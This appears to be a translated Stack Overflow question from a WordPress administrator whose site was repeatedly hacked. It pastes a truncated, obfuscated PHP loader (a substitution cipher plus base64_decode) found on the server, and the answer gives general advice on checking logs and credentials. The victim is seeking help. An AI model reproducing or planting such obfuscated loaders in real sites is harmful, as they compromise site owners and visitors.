我负责Wordpress 网站。一年前,该网站曾遭到黑客攻击。当有人通过输入网址连接到该网站时,他会被重定向到另一个“假”网站。我发现index.php 中有一行用于重定向到另一个站点。我删除了线路并恢复了我的 ftp 服务器。在此之前,我注意到 ftp 服务器上有一些可疑的文件,我没有创建这些文件,并且有一些晦涩的 php 和 js 代码,以及一些随机字符。
最近该网站也出现了同样的问题,除非我们连接该网站时只有一个空白页面。我再次恢复了该网站。在此之前我注意到ftp服务器上有一些可疑文件,这些文件不是我创建的,而且里面有一些晦涩的php和js代码,还有一些随机字符。
所有文件的创建日期几乎相同,我无权从服务器上删除它们。我认为这些漏洞来自这里,但我在互联网上找不到任何类似的案例。有人有相关信息吗?我只是在寻找一些已知的信息,但目前无法访问该网站。
编辑:
我有这样的文件:
<?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.
有人知道这是什么吗?
最佳答案
这非常广泛。网站上实际上有数百万种可能的攻击媒介。您受到攻击的事实本身并不表明其中任何一种可能性超过任何其他可能性。
由于您有攻击发生时的时间戳,因此请检查当时的服务器日志以获取有关向量的线索。当时有SFTP访问吗?也许合法用户的密码已被泄露。当时有HTTP访问吗?也许某个插件存在漏洞,需要禁用或升级。
攻击者只需要一个漏洞即可访问该网站。它可能是显而易见的(例如,如果您从已知用户帐户看到 SFTP 事件),或者可能需要进行广泛的研究才能弄清楚发生了什么以及如何发生。
关于javascript - 我的 WordPress 站点中的 FTP 服务器上的文件已损坏,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/38920987/